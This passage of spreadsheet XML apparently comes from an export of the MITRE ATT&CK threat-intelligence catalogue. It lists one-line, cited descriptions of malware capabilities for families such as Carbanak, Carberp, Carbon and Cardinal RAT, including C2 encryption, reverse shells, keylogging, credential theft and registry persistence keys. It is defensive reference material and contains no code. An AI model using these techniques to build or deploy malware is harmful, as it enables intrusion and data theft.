    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to download a file to the victim from the C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--bdd64378-e348-4156-8490-528392c6ea82</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) uses AES to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--bf8ae26c-c28c-4de7-a3e2-ad1a2851c1c0</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to create a reverse shell on victims.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--c3d3bb7d-65cc-4915-bc28-492d341e6dbd</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--48106cb0-a9c8-4c68-b90a-8d517078d189</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain victim drive information as well as a list of folders in C:\Program Files.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--b3c69087-f989-4f93-924a-0d6df6c75315</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can download a payload for execution.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--f315cbb6-e49c-4820-99cb-262d36acf17f</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--62391d2c-56de-42e3-a937-fb9ffa3a4308</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain a list of processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>relationship--11870221-f730-4844-a441-ac1e8d21bc4b</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can take a screenshot of the desktop.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--3d1fe308-5bef-4e7a-9daa-333680a11d7b</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather system information from the victim’s machine such as the OS version, machine name, and drive information.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>relationship--f9bf12c3-7512-47fe-86d7-cc89662abad4</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather the username from the system.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--47a31ea1-4b4d-4141-9d41-07d3b229913c</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can collect the current time zone information from the victim’s machine.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--a3d44c1d-2833-4355-b560-2a7a4fcaac14</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) adds the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; to establish persistence.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>relationship--fdc9c7e3-4467-4f57-af5b-156cf2f9d189</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) exfiltrates data in compressed chunks if a message is larger than 4096 bytes .(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--f4182c2a-c2b3-4866-9f7e-f29e0229dead</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to delete files.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--d0b3dc96-7adb-4d38-b3cf-b448535ffa60</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) logs key strokes for configured processes and sends them back to the C2 server.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--82384148-90fd-4bfa-a734-e9c8b37b584f</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) can create a Windows account.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--a7fc5d9b-7010-4bab-9e77-3b8e449a98bd</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--64e3196b-50c6-47d9-8841-1b7902a1546a</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) obtains Windows logon password details.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--13910722-9dc6-499f-9fbf-0a9cb3daab11</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts strings to make analysis more difficult.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--7c3f8d37-e2da-45c3-8ef2-a067cd46d340</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) downloads an executable and injects it directly into a new process.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--5950182b-4e27-4d5e-87bb-c8598314622c</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) lists running processes.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--6a09f442-6a2a-455a-ad8d-6aa192995de3</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) checks the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt; for proxy configurations information.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--3a217a5a-b6c4-47c5-822a-5b278385c811</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--9c12e724-5f3e-4209-961e-481ec22a5ab6</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a plugin for VNC and Ammyy Admin Tool.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--7fa238de-37c5-4224-b760-bf9f00001051</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) enables concurrent Remote Desktop Protocol (RDP) sessions.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--4b310a47-e010-4984-afcb-52d9c8c7933a</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--16d5d573-60bb-402c-88c3-2bc0af8388eb</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encodes the message body of HTTP traffic with Base64.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--d9302591-bba1-420e-96ac-401304d37258</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts the message body of HTTP traffic with RC2 (in CBC mode). [Carbanak](https://attack.mitre.org/software/S0030) also uses XOR with random keys for its communications.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--a9bd68ed-2602-4225-838e-2d9b7f8761b4</t>
  </si>
  <si>
    <t>The [Carbanak](https://attack.mitre.org/software/S0030) malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--210f5206-8763-48ac-a4c3-a08440892b5d</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to create a reverse shell.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>relationship--54847cda-c38f-4a5b-8328-d0e6812b837b</t>
  </si>
  <si>
    <t>S0484</t>
  </si>
  <si>
    <t>Carberp</t>
  </si>
  <si>
    <t>malware--bbcd7a02-ef24-4171-ac94-a93540173b94</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--63a09269-0546-4613-b746-0e1f8dac7d5b</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>relationship--02c3d977-d797-4105-9535-11682d4896e9</t>
  </si>
  <si>
    <t>15 July 2020</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--4c7a0e49-6b38-417a-881b-6f9474ea4ec2</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions to steal credentials.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--22de39b7-5d1c-4d44-b63c-36cf14a9c90d</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--0d8d668e-ce2f-4ef8-8dd4-8c9cd17f2b23</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--fafa8b19-211d-4878-9d80-2126e1604b68</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--47b76146-c9d2-4012-932b-839c9756c2c9</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>relationship--d5f2b0fc-c865-419d-aacd-8004ecba00df</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--30c0f7aa-473d-42c3-81ff-f39c6f21ee52</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</si>
  <si>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</si>
  <si>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relationship--5fdf6cb3-8046-4c32-aca6-75cda70b7614</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--9b2a5ea0-3199-44ee-a5a5-959e95d3a2e5</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--320966af-53db-41e3-aaf0-f5fd68bce8ca</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as "chkntfs.exe" and "syscron.exe".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--201502c6-d208-408b-b6f3-50e39dab14ca</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--caa542d3-c8b0-4d10-998d-0998be406da8</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--c808ac7c-6da1-4be8-9233-0020fbc3e8ac</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--f83167c8-b964-44d2-b370-5f5e86460568</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for "Debugger" within every subkey.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--8de816a1-c89b-47ea-9456-c3bc139e6885</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--23bc50df-16da-4b2d-89b3-1a74c7602aa2</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--21b929b8-8fec-47a5-8f98-554a043f9de5</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--e1a70685-4492-4866-a10b-7630be265c86</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--8121ed43-42eb-42ad-a86f-26fb53b71975</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--dacff5f4-a7ed-424b-847b-377ed2b91679</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>relationship--34072026-f8dd-4eb0-88d9-c76cddfa8ca2</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>relationship--2c112e41-be75-4f99-84ac-ce7776f88fca</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>relationship--c3add97f-09bc-4c16-81ff-116106558487</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--732e753e-49c2-4af4-8b3b-c81e577d7a42</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) decrypts task and configuration files for execution.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--848313af-f9c3-4b51-a24a-d2e88487ab53</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has a command to inject code into a process.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--b9b2ddad-acb6-4e97-966c-ff18fd36cea3</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses HTTP to send data to the C2 server.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--8f104e2e-4816-4551-b4a6-9f0ed1e01218</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates a base directory that contains the files and folders that are collected.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--487cc105-dd80-4b43-94ae-da23517aab6f</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses TCP and UDP for C2.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--ae3c0dc8-de95-40bc-bced-a3c61d7ad605</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--aac99c91-e1b1-42c0-8a13-f166027d5168</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net group&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>relationship--3bda9db3-3532-429c-86a4-8ff3ee32f59f</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can list the processes on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--e6f2f304-e637-4636-a238-b30904ce11fc</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) enumerates values in the Registry.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--3598d32e-306d-421d-af3c-8c9f5d1628a2</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net view&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>relationship--a951bef0-4a5a-49b0-b6bd-6a4dfbd60ca0</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates several tasks for later execution to continue persistence on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--185a72dd-e151-4eba-81f4-c3eeaa67873a</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</si>
  <si>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</si>
  <si>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relationship--45f5f01e-cfdd-4212-8bd6-0c1b0c82a0a2</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;netstat -r&lt;/code&gt; and &lt;code&gt;netstat -an&lt;/code&gt; commands.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>relationship--344f58f9-fefa-4c50-888c-25b2ef9e7dd2</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the command &lt;code&gt;net time \\127.0.0.1&lt;/code&gt; to get information the system’s time.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>relationship--40a2c8e2-df1c-41a8-beec-951214c8e101</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--a9bec496-3c5f-43b7-afd1-1db713010e74</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use Pastebin to receive C2 commands.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--1ef0015d-f4ab-49fe-a5b2-89e601ea5cfa</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) establishes persistence by creating a service and naming it based off the operating system version running on the current machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>relationship--677e0d3e-4a61-490d-a49d-f392cc3432d1</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>malware--b879758f-bbc4-4cab-b5ba-177ac9b009b4</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) applies compression to C2 traffic using the ZLIB library.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--811ad4bc-198d-400a-a5f0-10d0ef856794</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--94bb62b3-e917-47cb-a717-560b28ea3d56</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) decodes many of its artifacts and is decrypted (AES-128) after being downloaded.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--bfe474ce-d88f-4372-9918-a04470ba080e</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can communicate over multiple C2 host and port combinations.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--d3e0b0b8-797f-4638-bcb6-aa688c3a0a9a</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can uninstall itself, including deleting its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--a2e37152-fda1-4d4f-8d9b-3ad85f1f764e</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</si>
  <si>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</si>
  <si>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relationship--3572a770-9151-42d5-82b5-360002725052</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can download and execute additional payloads.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--2e83c5c4-76f3-46a3-980f-0063069671cf</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can log keystrokes.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--458eebea-e73b-4417-9ce0-11417f6b0289</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) lures victims into executing malicious macros embedded within Microsoft Excel documents.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--7571e0ac-281a-495b-bc7a-9cffd7dfc09f</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) sets &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--d7983dcd-1970-4d84-82e7-a61d2125caeb</t>
  </si>
  <si>
    <t xml:space="preserve">[Cardinal RAT](https://attack.mitre.org/software/S0348) encodes many of its artifacts and is encrypted (AES-128) when downloaded.(Citation: PaloAlto CardinalRat Apr 2017) </t>
  </si>
  <si>
    <t>relationship--ff950ea2-2982-4bfd-8361-7755e83778fd</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that ensures its process is always running, else spawns a new instance.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--ed51de86-8e28-4436-a663-94b66f22a7df</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) injects into a newly spawned process created from a native Windows executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--a24d8975-fa51-4ac1-b928-9af5b5660109</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can act as a reverse proxy.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--a03d084b-c216-4962-93e8-6c0dc8f0cb91</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that periodically ensures &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; is set to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--8875e27f-9f8d-418b-8937-a2c4d1858607</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) establishes Persistence by setting the  &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; Registry key to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--df05fecd-1eee-4139-8090-794a3310b478</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can capture screenshots.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--f44842c1-f17d-4bb0-8803-3eee13cf831e</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--4d6a3a5b-58c2-4dab-8710-fe7e6b893f98</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--c50c585a-b5c4-41c7-91a2-b6bb14b7e1f0</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the username from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--395fbd2c-7827-49b3-8121-72d54181f0b1</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--d53cb718-c7a5-42e5-bc2b-dc14ceebbb17</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can execute commands.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>relationship--1ffac810-9c9e-4060-9902-737085ba8bc5</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) obtains application windows titles and then determines which windows to perform [Screen Capture](https://attack.mitre.org/techniques/T1113) on.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--d93fb52b-985e-4012-9b9f-8638e35c18a0</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) steals data stored in the clipboard.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--a804782a-fc22-43ab-a561-63007284bdf9</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) collects keystrokes from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--29f2ee6a-682d-4812-b7d6-ff00cabf09dc</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) stores the gathered data from the machine in .db files and .bmp files under four separate locations.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--ad77932b-9632-4816-b9af-db6257f5a7d4</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--b4c195b6-7b1f-4320-8040-e91c11ec8cbb</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) creates three Registry keys to establish persistence by adding a [Windows Service](https://attack.mitre.org/techniques/T1543/003).(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--0dd74596-509c-4669-9d29-e1fb501c9c70</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) captures screenshots based on specific keywords in the window’s title.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--f2f155f1-5152-4681-9c0b-b4a01968fa2e</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) gathers the Mac address, IP address, and the network adapter information from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--a5bf547a-7fe3-4fa5-96f7-a932e583bf9e</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter to establish persistence.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>relationship--6b43b9ca-a916-44da-9ba5-917f03984157</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to perform brute force attacks on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--4cf22fd0-af3a-41b7-b0ad-07b73b6d5516</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to collect information from the local database.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--33deb846-1334-4eb7-98fc-faff39b3ad16</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can upload files over the C2 channel.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--a1c31042-ca50-4bcc-bd05-20eb48c655ef</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can search for files in directories.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--3f824a1b-70d5-4859-bd55-6b084f602a52</t>
  </si>
  <si>
